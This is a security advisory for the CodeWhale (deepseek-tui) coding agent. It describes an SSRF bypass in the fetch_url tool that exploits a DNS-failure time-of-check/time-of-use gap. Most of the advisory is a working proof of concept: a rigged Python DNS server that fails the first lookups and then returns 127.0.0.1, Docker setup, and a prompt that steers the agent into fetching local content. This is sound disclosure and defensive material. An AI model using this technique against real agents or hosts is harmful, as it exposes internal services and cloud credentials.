GHSA-6v2g-fpxh-pmmh

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    GHSA-6v2g-fpxh-pmmh

    Published: 4 Sept 2026Last Modified: 4 Sept 2026

    Summary: CodeWhale: SSRF‌ bypass - TOCTOU on DNS failure for DNS pinning

    Details: ### Maintainer resolution The CodeWhale maintainers validated this report. The affected package ranges are recorded in the advisory metadata. Version 0.8.64 contains the fix in commit 26de44a8bd5051f8f944ea60b2c37ae1d2b7d25e. Users should upgrade to 0.8.64 or later. The original reporter analysis is preserved below. ### Summary DNS-pinning failure allows natural failure of code, however with a custom DNS server that fails the initial requests and allows the secondary requests, it's possible to bypass the logic. ### Details Simplified attack scenario: 1. Attacker asks agent to visit the `mydomain.com`. 2. CodeWhale tries to resolve the IP of `mydomain.com`, however, the custom DNS server that's controlled by the attacker marks the request DNS‌ query as failed (Time of Check). 3. CodeWhale allows the code to continue as it expects it request to fail again. 4. On the secondary (Time of Use), the DNS server resolves mydomain.com to a local IP (e.g., 127.0.0.1) 5. The request is executed and the content from port 80 is returned to the attacker, allowing full bypass of SSRF mitigations. In the [DNS-pinning](https://github.com/Hmbown/CodeWhale/blob/8dff2f7525ead210a01347b48f53ae3f20d094ec/crates/tui/src/tools/fetch_url.rs#L362) section, when DNS fails, the code is allowed to continue as it's expected to fail. However ### PoC This is a custom DNS server that fails the first requests (in this case, the first and second requests must fail, while the 3rd and 4th are allowed due to A and AAAA DNS queries). Here is the code for the DNS‌ server(for PoC, should be placed in `dnser/dns_resolver.py`: ```python #!/usr/bin/env python3 """ Local DNS Resolver — customizable request/response handling. Uses only the standard library + dnslib. Usage: pip install dnslib sudo python dns_resolver.py # binds to 0.0.0.0:53 by default python dns_resolver.py --port 5353 # unprivileged port for testing """ import argparse import socket import threading from dnslib import DNSRecord, DNSHeader, RR, QTYPE, A, CNAME, AAAA UPSTREAM_DNS = ("8.8.8.8", 53) # fallback resolver def handle_no_aaaa(query: DNSRecord) -> DNSRecord | None: """Drop all AAAA requests.""" if QTYPE[query.q.qtype] == "AAAA": reply = query.reply() reply.header.rcode = 3 # NXDOMAIN return reply return None def handle_blocked(query: DNSRecord) -> DNSRecord | None: """Block domains by returning NXDOMAIN.""" blocked = {"blocked.example.com.", "ads.tracker.io."} qname = str(query.q.qname) if qname in blocked: print(f" [BLOCKED] {qname}") reply = query.reply() reply.header.rcode = 3 # NXDOMAIN return reply return None failer = 0 MAX_FAIL = 2 MAX_SUCCESS = 2 def handle_overrides(query: DNSRecord) -> DNSRecord | None: global failer """Return hardcoded A records for specific names (split-horizon / local dev).""" overrides: dict[str, str] = { "myapp.local.": "127.0.0.1", "devserver.local.": "192.168.1.100", "mydomain.com.": "127.0.0.1", } qname = str(query.q.qname) qtype = QTYPE[query.q.qtype] if qname in overrides and qtype == "A": failer += 1 cycle_pos = (failer - 1) % (MAX_FAIL + MAX_SUCCESS) # position within cycle should_fail = cycle_pos < MAX_FAIL print(f" [OVERRIDE] request={failer} cycle_pos={cycle_pos} fail={should_fail}") if should_fail: reply = query.reply() reply.header.rcode = 3 reply.header.ra = 0 return reply ip = overrides[qname] print(f" [OVERRIDE] {qname} → {ip}") reply = query.reply() reply.add_answer(RR(qname, QTYPE.A, rdata=A(ip), ttl=0)) reply.header.ra = 0 return reply return None def handle_rewrite(query: DNSRecord) -> DNSRecord | None: """Rewrite a CNAME transparently (resolve alias locally).""" rewrites: dict[str, str] = { # "old.internal.": "new.internal.", } qname = str(query.q.qname) if qname in rewrites: target = rewrites[qname] print(f" [REWRITE] {qname} → {target}") reply = query.reply() reply.add_answer(RR(qname, QTYPE.CNAME, rdata=CNAME(target), ttl=60)) return reply return None def handle_upstream(query: DNSRecord) -> DNSRecord | None: """Forward the query to the upstream resolver.""" try: raw = query.pack() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(3) sock.sendto(raw, UPSTREAM_DNS) data, _ = sock.recvfrom(4096) sock.close() reply = DNSRecord.parse(data) print(f" [UPSTREAM] {query.q.qname} → {UPSTREAM_DNS[0]}") return reply except Exception as e: print(f" [UPSTREAM ERROR] {e}") return None # Chain of responsibility — handlers are tried in order; first non-None wins. HANDLERS = [ handle_blocked, handle_overrides, handle_rewrite, handle_upstream, ] # ───────────────────────────────────────────────────────────────────────────── # Server plumbing — no need to edit below this line # ───────────────────────────────────────────────────────────────────────────── def resolve(data: bytes) -> bytes: try: query = DNSRecord.parse(data) qname = str(query.q.qname) qtype = QTYPE[query.q.qtype] print(f"[QUERY] {qtype} {qname}") for handler in HANDLERS: reply = handler(query) if reply is not None: return reply.pack() # Fallback: SERVFAIL reply = query.reply() reply.header.rcode = 2 return reply.pack() except Exception as e: print(f"[ERROR] Failed to parse/handle query: {e}") return b"" def udp_server(host: str, port: int) -> None: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((host, port)) print(f"DNS resolver listening on {host}:{port} (UDP)") while True: data, addr = sock.recvfrom(4096) threading.Thread( target=lambda d=data, a=addr: sock.sendto(resolve(d), a), daemon=True, ).start() def tcp_server(host: str, port: int) -> None: srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) srv.bind((host, port)) srv.listen(10) print(f"DNS resolver listening on {host}:{port} (TCP)") def handle_conn(conn: socket.socket) -> None: with conn: length_bytes = conn.recv(2) if len(length_bytes) < 2: return length = int.from_bytes(length_bytes, "big") data = conn.recv(length) response = resolve(data) conn.sendall(len(response).to_bytes(2, "big") + response) while True: conn, _ = srv.accept() threading.Thread(target=handle_conn, args=(conn,), daemon=True).start() def main() -> None: parser = argparse.ArgumentParser(description="Local DNS resolver") parser.add_argument("--host", default="0.0.0.0", help="Bind address") parser.add_argument("--port", type=int, default=53, help="Bind port (use 5353 for unprivileged)") args = parser.parse_args() t_udp = threading.Thread(target=udp_server, args=(args.host, args.port), daemon=True) t_tcp = threading.Thread(target=tcp_server, args=(args.host, args.port), daemon=True) t_udp.start() t_tcp.start() try: t_udp.join() except KeyboardInterrupt: print("\nShutting down.") if __name__ == "__main__": main() ``` Docker file to build it(`dnser/Dockerfile`): ```bash FROM python:3.12-slim WORKDIR /app RUN pip install dnslib --no-cache-dir COPY dns_resolver.py . EXPOSE 53/udp EXPOSE 53/tcp CMD ["python", "-u", "dns_resolver.py", "--host", "0.0.0.0", "--port", "53"] ``` Then to simplify the test, we can set everything in a container and make the agent use the local DNS resolver: `docker-compose.yml`: ```yaml services: dns-resolver: build: dnser container_name: dns-resolver restart: unless-stopped networks: dns-net: ipv4_address: 10.0.1.2 a: image: ghcr.io/hmbown/deepseek-tui:latest container_name: tui environment: DEEPSEEK_API_KEY: sk- stdin_open: true tty: true dns: 10.0.1.2 networks: - dns-net depends_on: - dns-resolver sysctls: net.ipv6.conf.all.disable_ipv6: 1 networks: dns-net: driver: bridge ipam: config: - subnet: 10.0.1.0/24 ``` Then to check everything we could simply: `sudo docker attach tui` Prompt: `read contnet of http://mydomain.com using fetch_url tools, no thinking just raw output` The tool will allow the request to go through 127.0.0.1. To make sure it's not a false-positive I've also installed python in CodeWhale container and ran `python3 -m http.server 80` as root to make sure the request can actually read content. To read the logs from dns-resolver: `sudo docker logs -f dns-resolver` ### Impact Similar to other SSRF bypasses, other services private on the system, private network, and cloud credentials are at risk.

    Affected packages

    Package

    Name: deepseek-tui

    Purl: pkg:cargo/deepseek-tui

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0.8.5
    Fixed -None

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High